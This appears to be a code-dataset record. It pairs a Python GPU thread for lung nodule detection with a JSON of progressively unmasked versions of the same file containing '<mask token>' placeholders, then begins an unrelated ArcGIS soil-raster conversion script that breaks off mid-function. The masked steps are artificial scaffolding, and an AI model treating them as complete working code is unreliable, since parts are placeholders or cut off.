l_u = pickle._Unpickler(open("./model/left_gmm.pkl", "rb"))
l_u.encoding = "latin1"
self.left_gmm = l_u.load()
r_u = pickle._Unpickler(open("./model/right_gmm.pkl", "rb"))
r_u.encoding = "latin1"
self.right_gmm = r_u.load()
# cudnn.benchmark = True
def run(self):
i = 0
while True:
result_dict = self.que_det.get(block=True)
try:
print(
time.ctime(),
" ",
result_dict["json_id"],
" Using GPU Device ",
self.index,
)
t_s = time.time()
nodule_df = self.lung_dete.prediction(
result_dict["prep_data"],
result_dict["prep_spac"],
result_dict["prep_ebox"],
result_dict["prep_mask"],
)
print(
time.ctime(),
" ",
result_dict["json_id"],
"GPU DOING USE TIME(lung dete prediction):",
time.time() - t_s,
)
t_s = time.time()
preb = self.lung_isnc.nodule_cls(
nodule_df, result_dict["prep_case"], result_dict["prep_spac"]
)
print(
time.ctime(),
" ",
result_dict["json_id"],
"GPU DOING USE TIME(lung isnc nodule cls):",
time.time() - t_s,
)
# preb = lung_isnc.nodule_cls(nodule_df, result_dict['prep_case'], result_dict['prep_spac'])
# del lung_isnc
t_s = time.time()
preb = self.lung_lobe(preb, result_dict["prep_mask"])
result_dict["nodule_preb"] = preb
self.que_ret.put(result_dict, timeout=2)
print(
time.ctime(),
" ",
result_dict["json_id"],
"GPU DOING US TIME(lung lobe):",
time.time() - t_s,
)
i += 1
del result_dict, nodule_df, preb
except FunctionTimedOut:
print(time.ctime(), result_dict["json_id"], "GPU FUN TIMEOUT ")
except Exception as e:
if result_dict and "json_id" in result_dict.keys():
print(
time.ctime()
+ "GPU ERROR : {} {}".format(e, result_dict["json_id"])
)
error_info(200, result_dict)
else:
print(time.ctime() + "GPU ERROR : {}".format(e))
@func_set_timeout(5)
def lung_lobe(self, nodule_df, mask):
nodule_df_values = nodule_df[["coordX", "coordY", "coordZ"]].values
lungs = []
lobes = []
lobel_info = []
for nodule in nodule_df_values:
lung, lobe = lobe_locate_gmm(nodule, mask, self.left_gmm, self.right_gmm)
lungs.append(lung)
lobes.append(lobe)
lobel_info.append(lung + "肺" + (lobe + "叶" if not lobe == "" else ""))
nodule_df["lung"] = lungs
nodule_df["lobe"] = lobes
nodule_df["lobel_info"] = lobel_info
return nodule_df
|
normal
|
{
"blob_id": "8035f195cd01dc50691cd93ea91a6377b1d83f24",
"index": 1166,
"step-1": "<mask token>\n\n\nclass GpuThread(threading.Thread):\n <mask token>\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(time.ctime(), ' ', result_dict['json_id'],\n ' Using GPU Device ', self.index)\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(result_dict[\n 'prep_data'], result_dict['prep_spac'], result_dict[\n 'prep_ebox'], result_dict['prep_mask'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung dete prediction):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(nodule_df, result_dict[\n 'prep_case'], result_dict['prep_spac'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung isnc nodule cls):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict['prep_mask'])\n result_dict['nodule_preb'] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING US TIME(lung lobe):', time.time() - t_s)\n i += 1\n del result_dict, nodule_df, preb\n except FunctionTimedOut:\n print(time.ctime(), result_dict['json_id'], 'GPU FUN TIMEOUT ')\n except Exception as e:\n if result_dict and 'json_id' in result_dict.keys():\n print(time.ctime() + 'GPU ERROR : {} {}'.format(e,\n result_dict['json_id']))\n error_info(200, result_dict)\n else:\n print(time.ctime() + 'GPU ERROR : {}'.format(e))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass GpuThread(threading.Thread):\n\n def __init__(self, que_det, que_ret, index):\n threading.Thread.__init__(self)\n self.que_det = que_det\n self.que_ret = que_ret\n self.index = index\n self.lung_dete = LungDetection('./model/det.ckpt', self.index)\n self.lung_isnc = LungIsncls('./model/isn.ckpt', self.index)\n l_u = pickle._Unpickler(open('./model/left_gmm.pkl', 'rb'))\n l_u.encoding = 'latin1'\n self.left_gmm = l_u.load()\n r_u = pickle._Unpickler(open('./model/right_gmm.pkl', 'rb'))\n r_u.encoding = 'latin1'\n self.right_gmm = r_u.load()\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(time.ctime(), ' ', result_dict['json_id'],\n ' Using GPU Device ', self.index)\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(result_dict[\n 'prep_data'], result_dict['prep_spac'], result_dict[\n 'prep_ebox'], result_dict['prep_mask'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung dete prediction):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(nodule_df, result_dict[\n 'prep_case'], result_dict['prep_spac'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung isnc nodule cls):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict['prep_mask'])\n result_dict['nodule_preb'] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING US TIME(lung lobe):', time.time() - t_s)\n i += 1\n del result_dict, nodule_df, preb\n except FunctionTimedOut:\n print(time.ctime(), result_dict['json_id'], 'GPU FUN TIMEOUT ')\n except Exception as e:\n if result_dict and 'json_id' in result_dict.keys():\n print(time.ctime() + 'GPU ERROR : {} {}'.format(e,\n result_dict['json_id']))\n error_info(200, result_dict)\n else:\n print(time.ctime() + 'GPU ERROR : {}'.format(e))\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass GpuThread(threading.Thread):\n\n def __init__(self, que_det, que_ret, index):\n threading.Thread.__init__(self)\n self.que_det = que_det\n self.que_ret = que_ret\n self.index = index\n self.lung_dete = LungDetection('./model/det.ckpt', self.index)\n self.lung_isnc = LungIsncls('./model/isn.ckpt', self.index)\n l_u = pickle._Unpickler(open('./model/left_gmm.pkl', 'rb'))\n l_u.encoding = 'latin1'\n self.left_gmm = l_u.load()\n r_u = pickle._Unpickler(open('./model/right_gmm.pkl', 'rb'))\n r_u.encoding = 'latin1'\n self.right_gmm = r_u.load()\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(time.ctime(), ' ', result_dict['json_id'],\n ' Using GPU Device ', self.index)\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(result_dict[\n 'prep_data'], result_dict['prep_spac'], result_dict[\n 'prep_ebox'], result_dict['prep_mask'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung dete prediction):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(nodule_df, result_dict[\n 'prep_case'], result_dict['prep_spac'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung isnc nodule cls):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict['prep_mask'])\n result_dict['nodule_preb'] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING US TIME(lung lobe):', time.time() - t_s)\n i += 1\n del result_dict, nodule_df, preb\n except FunctionTimedOut:\n print(time.ctime(), result_dict['json_id'], 'GPU FUN TIMEOUT ')\n except Exception as e:\n if result_dict and 'json_id' in result_dict.keys():\n print(time.ctime() + 'GPU ERROR : {} {}'.format(e,\n result_dict['json_id']))\n error_info(200, result_dict)\n else:\n print(time.ctime() + 'GPU ERROR : {}'.format(e))\n\n @func_set_timeout(5)\n def lung_lobe(self, nodule_df, mask):\n nodule_df_values = nodule_df[['coordX', 'coordY', 'coordZ']].values\n lungs = []\n lobes = []\n lobel_info = []\n for nodule in nodule_df_values:\n lung, lobe = lobe_locate_gmm(nodule, mask, self.left_gmm, self.\n right_gmm)\n lungs.append(lung)\n lobes.append(lobe)\n lobel_info.append(lung + '肺' + (lobe + '叶' if not lobe == '' else\n ''))\n nodule_df['lung'] = lungs\n nodule_df['lobe'] = lobes\n nodule_df['lobel_info'] = lobel_info\n return nodule_df\n",
"step-4": "import threading\nimport time\nimport pickle\nfrom utils.ret_utils import error_info\nfrom nodule_class.isnodule import LungIsncls\nfrom preprocessing.location import lobe_locate_gmm\nfrom detection.lung_detection import LungDetection\nfrom func_timeout import FunctionTimedOut\nfrom func_timeout import func_set_timeout\nimport weakref\n\n\nclass GpuThread(threading.Thread):\n\n def __init__(self, que_det, que_ret, index):\n threading.Thread.__init__(self)\n self.que_det = que_det\n self.que_ret = que_ret\n self.index = index\n self.lung_dete = LungDetection('./model/det.ckpt', self.index)\n self.lung_isnc = LungIsncls('./model/isn.ckpt', self.index)\n l_u = pickle._Unpickler(open('./model/left_gmm.pkl', 'rb'))\n l_u.encoding = 'latin1'\n self.left_gmm = l_u.load()\n r_u = pickle._Unpickler(open('./model/right_gmm.pkl', 'rb'))\n r_u.encoding = 'latin1'\n self.right_gmm = r_u.load()\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(time.ctime(), ' ', result_dict['json_id'],\n ' Using GPU Device ', self.index)\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(result_dict[\n 'prep_data'], result_dict['prep_spac'], result_dict[\n 'prep_ebox'], result_dict['prep_mask'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung dete prediction):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(nodule_df, result_dict[\n 'prep_case'], result_dict['prep_spac'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung isnc nodule cls):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict['prep_mask'])\n result_dict['nodule_preb'] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING US TIME(lung lobe):', time.time() - t_s)\n i += 1\n del result_dict, nodule_df, preb\n except FunctionTimedOut:\n print(time.ctime(), result_dict['json_id'], 'GPU FUN TIMEOUT ')\n except Exception as e:\n if result_dict and 'json_id' in result_dict.keys():\n print(time.ctime() + 'GPU ERROR : {} {}'.format(e,\n result_dict['json_id']))\n error_info(200, result_dict)\n else:\n print(time.ctime() + 'GPU ERROR : {}'.format(e))\n\n @func_set_timeout(5)\n def lung_lobe(self, nodule_df, mask):\n nodule_df_values = nodule_df[['coordX', 'coordY', 'coordZ']].values\n lungs = []\n lobes = []\n lobel_info = []\n for nodule in nodule_df_values:\n lung, lobe = lobe_locate_gmm(nodule, mask, self.left_gmm, self.\n right_gmm)\n lungs.append(lung)\n lobes.append(lobe)\n lobel_info.append(lung + '肺' + (lobe + '叶' if not lobe == '' else\n ''))\n nodule_df['lung'] = lungs\n nodule_df['lobe'] = lobes\n nodule_df['lobel_info'] = lobel_info\n return nodule_df\n",
"step-5": "import threading\nimport time\n\n# import numpy as np\nimport pickle\nfrom utils.ret_utils import error_info\nfrom nodule_class.isnodule import LungIsncls\nfrom preprocessing.location import lobe_locate_gmm\nfrom detection.lung_detection import LungDetection\nfrom func_timeout import FunctionTimedOut\nfrom func_timeout import func_set_timeout\nimport weakref\n\n\nclass GpuThread(threading.Thread):\n def __init__(self, que_det, que_ret, index):\n threading.Thread.__init__(self)\n self.que_det = que_det\n self.que_ret = que_ret\n\n self.index = index\n self.lung_dete = LungDetection(\"./model/det.ckpt\", self.index)\n # is nodule cls\n self.lung_isnc = LungIsncls(\"./model/isn.ckpt\", self.index)\n\n l_u = pickle._Unpickler(open(\"./model/left_gmm.pkl\", \"rb\"))\n l_u.encoding = \"latin1\"\n self.left_gmm = l_u.load()\n\n r_u = pickle._Unpickler(open(\"./model/right_gmm.pkl\", \"rb\"))\n r_u.encoding = \"latin1\"\n self.right_gmm = r_u.load()\n # cudnn.benchmark = True\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(\n time.ctime(),\n \" \",\n result_dict[\"json_id\"],\n \" Using GPU Device \",\n self.index,\n )\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(\n result_dict[\"prep_data\"],\n result_dict[\"prep_spac\"],\n result_dict[\"prep_ebox\"],\n result_dict[\"prep_mask\"],\n )\n print(\n time.ctime(),\n \" \",\n result_dict[\"json_id\"],\n \"GPU DOING USE TIME(lung dete prediction):\",\n time.time() - t_s,\n )\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(\n nodule_df, result_dict[\"prep_case\"], result_dict[\"prep_spac\"]\n )\n print(\n time.ctime(),\n \" \",\n result_dict[\"json_id\"],\n \"GPU DOING USE TIME(lung isnc nodule cls):\",\n time.time() - t_s,\n )\n # preb = lung_isnc.nodule_cls(nodule_df, result_dict['prep_case'], result_dict['prep_spac'])\n # del lung_isnc\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict[\"prep_mask\"])\n result_dict[\"nodule_preb\"] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(\n time.ctime(),\n \" \",\n result_dict[\"json_id\"],\n \"GPU DOING US TIME(lung lobe):\",\n time.time() - t_s,\n )\n i += 1\n del result_dict, nodule_df, preb\n\n except FunctionTimedOut:\n print(time.ctime(), result_dict[\"json_id\"], \"GPU FUN TIMEOUT \")\n except Exception as e:\n if result_dict and \"json_id\" in result_dict.keys():\n print(\n time.ctime()\n + \"GPU ERROR : {} {}\".format(e, result_dict[\"json_id\"])\n )\n error_info(200, result_dict)\n else:\n print(time.ctime() + \"GPU ERROR : {}\".format(e))\n\n @func_set_timeout(5)\n def lung_lobe(self, nodule_df, mask):\n nodule_df_values = nodule_df[[\"coordX\", \"coordY\", \"coordZ\"]].values\n lungs = []\n lobes = []\n\n lobel_info = []\n for nodule in nodule_df_values:\n lung, lobe = lobe_locate_gmm(nodule, mask, self.left_gmm, self.right_gmm)\n lungs.append(lung)\n lobes.append(lobe)\n lobel_info.append(lung + \"肺\" + (lobe + \"叶\" if not lobe == \"\" else \"\"))\n nodule_df[\"lung\"] = lungs\n nodule_df[\"lobe\"] = lobes\n\n nodule_df[\"lobel_info\"] = lobel_info\n return nodule_df\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# SSURGO_ExportMuRaster.py
#
# Convert MUPOLYGON featureclass to raster for the specified SSURGO geodatabase.
# By default any small NoData areas (< 5000 sq meters) will be filled using
# the Majority value.
#
# Input mupolygon featureclass must have a projected coordinate system or it will skip.
# Input databases and featureclasses must use naming convention established by the
# 'SDM Export By State' tool.
#
# For geographic regions that have USGS NLCD available, the tool will automatically
# align the coordinate system and raster grid to match.
#
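# Expected script-tool parameters (a hedged summary of the MAIN block at the bottom of
# this file; the example values below are hypothetical, not part of the original tool):
#   0  muPolygon  - gSSURGO soil polygon featureclass, e.g. r"C:\gSSURGO\gSSURGO_NE.gdb\MUPOLYGON"
#   1  rasterName - name for the output geodatabase raster, e.g. "MapunitRaster_10m"
#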
# 10-31-2013 Added gap fill method
#
# 11-05-2014
# 11-22-2013
# 12-10-2013 Problem with using non-unique cellvalues for raster. Going back to
# creating an integer version of MUKEY in the mapunit polygon layer.
# 12-13-2013 Occasionally see error messages related to temporary GRIDs (g_g*) created
# under "C:\Users\steve.peaslee\AppData\Local\Temp\a subfolder". These
# are probably caused by orphaned INFO tables.
# 01-08-2014 Added basic raster metadata (still need process steps)
# 01-12-2014 Restricted conversion to use only input MUPOLYGON featureclass having
# a projected coordinate system with linear units=Meter
# 01-31-2014 Added progressor bar to 'Saving MUKEY values..'. Seems to be a hangup at this
# point when processing CONUS geodatabase
# 02-14-2014 Changed FeatureToLayer (CELL_CENTER) to PolygonToRaster (MAXIMUM_COMBINED_AREA)
# and removed the Gap Fill option.
# 2014-09-27 Added ISO metadata import
#
# 2014-10-18 Noticed that failure to create raster seemed to be related to long
# file names or non-alphanumeric characters such as a dash in the name.
#
# 2014-10-29 Removed ORDER BY MUKEY sql clause because some computers were failing on that line.
# Don't understand why.
#
# 2014-10-31 Added error message if the MUKEY column is not populated in the MUPOLYGON featureclass
#
# 2014-11-04 Problems occur when the user's gp environment points to Default.gdb for the scratchWorkpace.
# Added a fatal error message when that occurs.
#
# 2015-01-15 Hopefully fixed some of the issues that caused the raster conversion to crash at the end.
# Cleaned up some of the current workspace settings and moved the renaming of the final raster.
#
# 2015-02-26 Adding option for tiling raster conversion by areasymbol and then mosaicing. Slower and takes
# more disk space, but gets the job done when otherwise PolygonToRaster fails on big datasets.
# 2015-02-27 Make bTiling variable an integer (0, 2, 5) that can be used to slice the areasymbol value. This will
# give the user an option to tile by state (2) or by survey area (5)
# 2015-03-10 Moved sequence of CheckInExtension. It was at the beginning which seems wrong.
#
# 2015-03-11 Switched tiled raster format from geodatabase raster to TIFF. This should allow the entire
# temporary folder to be deleted instead of deleting rasters one-at-a-time (slow).
# 2015-03-11 Added attribute index (mukey) to raster attribute table
# 2015-03-13 Modified output raster name by incorporating the geodatabase name (after '_' and before ".gdb")
#
# 2015-09-16 Temporarily renamed output raster using a shorter string
#
# 2015-09-16 Trying several things to address 9999 failure on CONUS. Created a couple of ArcInfo workspace in temp
# 2015-09-16 Compacting geodatabase before PolygonToRaster conversion
#
# 2015-09-18 Still having problems with CONUS raster even with ArcGIS 10.3. Even the tiled method failed once
# on AR105. Actually may have been the next survey, but random order so don't know which one for sure.
# Trying to reorder mosaic to match the spatial order of the polygon layers. Need to figure out if
# the 99999 error in PolygonToRaster is occurring with the same soil survey or same count or any
# other pattern.
#
# 2015-09-18 Need to remember to turn off all layers in ArcMap. Redraw is triggered after each tile.
#
# 2015-10-01 Found problem apparently caused by 10.3. SnapRaster functionality was failing with tiles because of
# MakeFeatureLayer where_clause. Perhaps due to cursor lock persistence? Rewrote entire function to
# use SAPOLYGON featureclass to define extents for tiles. This seems to be working better anyway.
#
# 2015-10-02 Need to look at some method for sorting the extents of each tile and sort them in a geographic fashion.
# A similar method was used in the Create gSSURGO database tools for the Append process.
#
# 2015-10-23 Jennifer and I finally figured out what was causing her PolygonToRaster 9999 errors.
# It was dashes in the output GDB path. Will add a check for bad characters in path.
#
# 2015-10-26 Changed up SnapToNLCD function to incorporate SnapRaster input as long as the coordinate
# system matches and the extent coordinates are integer (no floating point!).
#
# 2015-10-27 Looking at possible issue with batchmode processing of rasters. Jennifer had several
# errors when trying to run all states at once.
#
# 2015-11-03 Fixed failure when indexing non-geodatabase rasters such as .IMG.
## ===================================================================================
class MyError(Exception):
pass
## ===================================================================================
def PrintMsg(msg, severity=0):
# prints message to screen if run as a python script
# Adds tool message to the geoprocessor
#
#Split the message on \n first, so that if it's multiple lines, a GPMessage will be added for each line
try:
for string in msg.split('\n'):
#Add a geoprocessing message (in case this is run as a tool)
if severity == 0:
arcpy.AddMessage(string)
elif severity == 1:
arcpy.AddWarning(string)
elif severity == 2:
arcpy.AddMessage(" ")
arcpy.AddError(string)
except:
pass
## ===================================================================================
def errorMsg():
try:
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
theMsg = tbinfo + "\n" + str(sys.exc_type)+ ": " + str(sys.exc_value)
PrintMsg(theMsg, 2)
except:
PrintMsg("Unhandled error in errorMsg method", 2)
pass
## ===================================================================================
def WriteToLog(theMsg, theRptFile):
# prints message to screen if run as a python script
# Adds tool message to the geoprocessor
#print msg
#
try:
fh = open(theRptFile, "a")
theMsg = "\n" + theMsg
fh.write(theMsg)
fh.close()
except:
errorMsg()
pass
## ===================================================================================
def elapsedTime(start):
# Calculate amount of time since "start" and return time string
try:
# Stop timer
#
end = time.time()
# Calculate total elapsed seconds
eTotal = end - start
# day = 86400 seconds
# hour = 3600 seconds
# minute = 60 seconds
eMsg = ""
# calculate elapsed days
eDay1 = eTotal / 86400
eDay2 = math.modf(eDay1)
eDay = int(eDay2[1])
eDayR = eDay2[0]
if eDay > 1:
eMsg = eMsg + str(eDay) + " days "
elif eDay == 1:
eMsg = eMsg + str(eDay) + " day "
# Calculated elapsed hours
eHour1 = eDayR * 24
eHour2 = math.modf(eHour1)
eHour = int(eHour2[1])
eHourR = eHour2[0]
if eDay > 0 or eHour > 0:
if eHour > 1:
eMsg = eMsg + str(eHour) + " hours "
else:
eMsg = eMsg + str(eHour) + " hour "
# Calculate elapsed minutes
eMinute1 = eHourR * 60
eMinute2 = math.modf(eMinute1)
eMinute = int(eMinute2[1])
eMinuteR = eMinute2[0]
if eDay > 0 or eHour > 0 or eMinute > 0:
if eMinute > 1:
eMsg = eMsg + str(eMinute) + " minutes "
else:
eMsg = eMsg + str(eMinute) + " minute "
        # Calculate elapsed seconds
eSeconds = "%.1f" % (eMinuteR * 60)
        if eSeconds == "1.0":
eMsg = eMsg + eSeconds + " second "
else:
eMsg = eMsg + eSeconds + " seconds "
return eMsg
except:
errorMsg()
return ""
## ===================================================================================
def Number_Format(num, places=0, bCommas=True):
try:
# Format a number according to locality and given places
#locale.setlocale(locale.LC_ALL, "")
if bCommas:
theNumber = locale.format("%.*f", (places, num), True)
else:
theNumber = locale.format("%.*f", (places, num), False)
return theNumber
except:
errorMsg()
return False
## ===================================================================================
def CheckStatistics(outputRaster):
# For no apparent reason, ArcGIS sometimes fails to build statistics. Might work one
# time and then the next time it may fail without any error message.
#
try:
#PrintMsg(" \n\tChecking raster statistics", 0)
for propType in ['MINIMUM', 'MAXIMUM', 'MEAN', 'STD']:
statVal = arcpy.GetRasterProperties_management (outputRaster, propType).getOutput(0)
#PrintMsg("\t\t" + propType + ": " + statVal, 1)
return True
except:
return False
## ===================================================================================
def UpdateMetadata(outputWS, target, surveyInfo, iRaster):
#
# Used for non-ISO metadata
#
# Search words: xxSTATExx, xxSURVEYSxx, xxTODAYxx, xxFYxx
#
try:
PrintMsg("\tUpdating metadata...")
arcpy.SetProgressor("default", "Updating metadata")
# Set metadata translator file
dInstall = arcpy.GetInstallInfo()
installPath = dInstall["InstallDir"]
prod = r"Metadata/Translator/ARCGIS2FGDC.xml"
mdTranslator = os.path.join(installPath, prod)
# Define input and output XML files
mdImport = os.path.join(env.scratchFolder, "xxImport.xml") # the metadata xml that will provide the updated info
xmlPath = os.path.dirname(sys.argv[0])
mdExport = os.path.join(xmlPath, "gSSURGO_MapunitRaster.xml") # original template metadata in script directory
# Cleanup output XML files from previous runs
if os.path.isfile(mdImport):
os.remove(mdImport)
# Get replacement value for the search words
#
stDict = StateNames()
st = os.path.basename(outputWS)[8:-4]
if st in stDict:
# Get state name from the geodatabase
mdState = stDict[st]
else:
# Leave state name blank. In the future it would be nice to include a tile name when appropriate
mdState = ""
# Set date strings for metadata, based upon today's date
#
d = datetime.date.today()
today = str(d.isoformat().replace("-",""))
# Set fiscal year according to the current month. If run during January thru September,
# set it to the current calendar year. Otherwise set it to the next calendar year.
#
if d.month > 9:
fy = "FY" + str(d.year + 1)
else:
fy = "FY" + str(d.year)
# Convert XML to tree format
tree = ET.parse(mdExport)
root = tree.getroot()
# new citeInfo has title.text, edition.text, serinfo/issue.text
citeInfo = root.findall('idinfo/citation/citeinfo/')
if not citeInfo is None:
# Process citation elements
# title, edition, issue
#
for child in citeInfo:
#PrintMsg("\t\t" + str(child.tag), 0)
if child.tag == "title":
if child.text.find('xxSTATExx') >= 0:
child.text = child.text.replace('xxSTATExx', mdState)
elif mdState != "":
child.text = child.text + " - " + mdState
elif child.tag == "edition":
if child.text == 'xxFYxx':
child.text = fy
elif child.tag == "serinfo":
for subchild in child.iter('issue'):
if subchild.text == "xxFYxx":
subchild.text = fy
# Update place keywords
ePlace = root.find('idinfo/keywords/place')
if not ePlace is None:
#PrintMsg("\t\tplace keywords", 0)
for child in ePlace.iter('placekey'):
if child.text == "xxSTATExx":
child.text = mdState
elif child.text == "xxSURVEYSxx":
child.text = surveyInfo
# Update credits
eIdInfo = root.find('idinfo')
if not eIdInfo is None:
#PrintMsg("\t\tcredits", 0)
for child in eIdInfo.iter('datacred'):
sCreds = child.text
if sCreds.find("xxSTATExx") >= 0:
#PrintMsg("\t\tcredits " + mdState, 0)
child.text = child.text.replace("xxSTATExx", mdState)
if sCreds.find("xxFYxx") >= 0:
#PrintMsg("\t\tcredits " + fy, 0)
child.text = child.text.replace("xxFYxx", fy)
if sCreds.find("xxTODAYxx") >= 0:
#PrintMsg("\t\tcredits " + today, 0)
child.text = child.text.replace("xxTODAYxx", today)
idPurpose = root.find('idinfo/descript/purpose')
if not idPurpose is None:
ip = idPurpose.text
if ip.find("xxFYxx") >= 0:
idPurpose.text = ip.replace("xxFYxx", fy)
#PrintMsg("\t\tpurpose", 0)
# create new xml file which will be imported, thereby updating the table's metadata
tree.write(mdImport, encoding="utf-8", xml_declaration=None, default_namespace=None, method="xml")
# import updated metadata to the geodatabase table
# Using three different methods with the same XML file works for ArcGIS 10.1
#
#PrintMsg("\t\tApplying metadata translators...")
arcpy.MetadataImporter_conversion (mdImport, target)
arcpy.ImportMetadata_conversion(mdImport, "FROM_FGDC", target, "DISABLED")
# delete the temporary xml metadata file
if os.path.isfile(mdImport):
os.remove(mdImport)
pass
# delete metadata tool logs
logFolder = os.path.dirname(env.scratchFolder)
logFile = os.path.basename(mdImport).split(".")[0] + "*"
currentWS = env.workspace
env.workspace = logFolder
logList = arcpy.ListFiles(logFile)
for lg in logList:
arcpy.Delete_management(lg)
env.workspace = currentWS
return True
except:
errorMsg()
        return False
## ===================================================================================
def CheckSpatialReference(muPolygon):
# Make sure that the coordinate system is projected and units are meters
try:
desc = arcpy.Describe(muPolygon)
inputSR = desc.spatialReference
if inputSR.type.upper() == "PROJECTED":
if inputSR.linearUnitName.upper() == "METER":
env.outputCoordinateSystem = inputSR
return True
else:
                raise MyError, os.path.basename(muPolygon) + ": Input soil polygon layer does not have a valid coordinate system for gSSURGO"
else:
            raise MyError, os.path.basename(muPolygon) + ": Input soil polygon layer must have a projected coordinate system"
except MyError, e:
# Example: raise MyError, "This is an error message"
PrintMsg(str(e), 2)
return False
except:
errorMsg()
return False
## ===================================================================================
def ConvertToRaster(muPolygon, rasterName):
# main function used for raster conversion
try:
#
# Set geoprocessing environment
#
env.overwriteOutput = True
arcpy.env.compression = "LZ77"
env.tileSize = "128 128"
gdb = os.path.dirname(muPolygon)
outputRaster = os.path.join(gdb, rasterName)
iRaster = 10 # output resolution is 10 meters
# Make sure that the env.scratchGDB is NOT Default.gdb. This causes problems for
# some unknown reason.
if (os.path.basename(env.scratchGDB).lower() == "default.gdb") or \
(os.path.basename(env.scratchWorkspace).lower() == "default.gdb") or \
(os.path.basename(env.scratchGDB).lower() == gdb):
raise MyError, "Invalid scratch workspace setting (" + env.scratchWorkspace + ")"
# Create an ArcInfo workspace under the scratchFolder. Trying to prevent
# 99999 errors for PolygonToRaster on very large databases
#
aiWorkspace = env.scratchFolder
if not arcpy.Exists(os.path.join(aiWorkspace, "info")):
#PrintMsg(" \nCreating ArcInfo workspace (" + os.path.basename(aiWorkspace) + ") in: " + os.path.dirname(aiWorkspace), 1)
arcpy.CreateArcInfoWorkspace_management(os.path.dirname(aiWorkspace), os.path.basename(aiWorkspace))
# turn off automatic Pyramid creation and Statistics calculation
env.rasterStatistics = "NONE"
env.pyramid = "PYRAMIDS 0"
env.workspace = gdb
# Need to check for dashes or spaces in folder names or leading numbers in database or raster names
desc = arcpy.Describe(muPolygon)
if not arcpy.Exists(muPolygon):
raise MyError, "Could not find input featureclass: " + muPolygon
# Check input layer's coordinate system to make sure horizontal units are meters
        # set the output coordinate system for the raster (necessary for PolygonToRaster)
if CheckSpatialReference(muPolygon) == False:
return False
# Sometimes it helps to compact large databases before raster conversion
#arcpy.SetProgressorLabel("Compacting database prior to rasterization...")
#arcpy.Compact_management(gdb)
# For rasters named using an attribute value, some attribute characters can result in
# 'illegal' names.
outputRaster = outputRaster.replace("-", "")
if arcpy.Exists(outputRaster):
arcpy.Delete_management(outputRaster)
time.sleep(1)
if arcpy.Exists(outputRaster):
err = "Output raster (" + os.path.basename(outputRaster) + ") already exists"
raise MyError, err
#start = time.time() # start clock to measure total processing time
#begin = time.time() # start clock to measure set up time
time.sleep(2)
PrintMsg(" \nBeginning raster conversion process", 0)
# Create Lookup table for storing MUKEY values and their integer counterparts
#
lu = os.path.join(env.scratchGDB, "Lookup")
if arcpy.Exists(lu):
arcpy.Delete_management(lu)
# The Lookup table contains both MUKEY and its integer counterpart (CELLVALUE).
# Using the joined lookup table creates a raster with CellValues that are the
# same as MUKEY (but integer). This will maintain correct MUKEY values
        # during a mosaic or clip.
#
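        # For example (an illustrative, hypothetical key): a polygon with mukey '462905' (text)
        # joins to a Lookup row (CELLVALUE=462905, mukey='462905'), so the raster cell VALUE is
        # the integer 462905 and can be mapped straight back to the original MUKEY afterwards.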
arcpy.CreateTable_management(os.path.dirname(lu), os.path.basename(lu))
arcpy.AddField_management(lu, "CELLVALUE", "LONG")
arcpy.AddField_management(lu, "mukey", "TEXT", "#", "#", "30")
# Create list of areasymbols present in the MUPOLYGON featureclass
# Having problems processing CONUS list of MUKEYs. Python seems to be running out of memory,
# but I don't see high usage in Windows Task Manager
#
# PrintMsg(" \nscratchFolder set to: " + env.scratchFolder, 1)
# Create list of MUKEY values from the MUPOLYGON featureclass
#
# Create a list of map unit keys present in the MUPOLYGON featureclass
#
PrintMsg("\tGetting list of mukeys from input soil polygon layer...", 0)
arcpy.SetProgressor("default", "Getting inventory of map units...")
tmpPolys = "SoilPolygons"
sqlClause = ("DISTINCT", None)
